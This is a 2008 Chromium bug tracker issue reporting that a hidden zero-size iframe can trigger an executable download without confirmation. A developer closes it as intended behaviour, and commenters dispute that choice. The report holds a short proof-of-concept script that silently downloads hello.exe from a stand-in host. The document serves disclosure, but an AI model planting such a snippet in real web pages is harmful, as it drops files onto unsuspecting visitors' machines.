My favorites | Sign in
Logo
             
New issue | Search
for
| Advanced search | Search tips
Issue 897: Automatic file download without confirmation possible
4 people starred this issue and may be notified of changes. Back to list
Status:  WontFix
Owner:  ----
Closed:  Sep 2008
OS-All
Pri-0
Type-Bug
Area-Unknown


Sign in to add a comment
 
Reported by I...@SoftCreatR.de, Sep 03, 2008
<script>
document.write('<iframe src="http://www.example.com/hello.exe" 
frameborder="0" width="0" height="0">');
</script>

This code allows to download a file without any confirmation.
Comment 1 by ian@chromium.org, Sep 03, 2008
Working as intended. If you want to be notified on every download, you can change
that in "under the hood" section of options ("Ask me where to download each file").
Status: WontFix
Labels: -private -Security
Comment 2 by finch.read, Sep 04, 2008
Shouldn't this default to 'are you sure' rather than default to 'instant download'.
Comment 3 by dtfinch, Sep 04, 2008
Reminds me of carpet bombing in Safari. I shouldn't need to confirm every download I 
start manually, but I'd like to be asked to confirm automatic downloads I didn't 
start.
Comment 4 by dtfinch, Sep 05, 2008
ZDNet has covered this WontFix vulnerability.
http://blogs.zdnet.com/security/?p=1843
Comment 5 by kamran_m...@yahoo.com, Oct 09, 2009
i want to download a file from other software not from google chrome..so plz tell me 
how to stop automatic download system in GOOGLE CHROME
Sign in to add a comment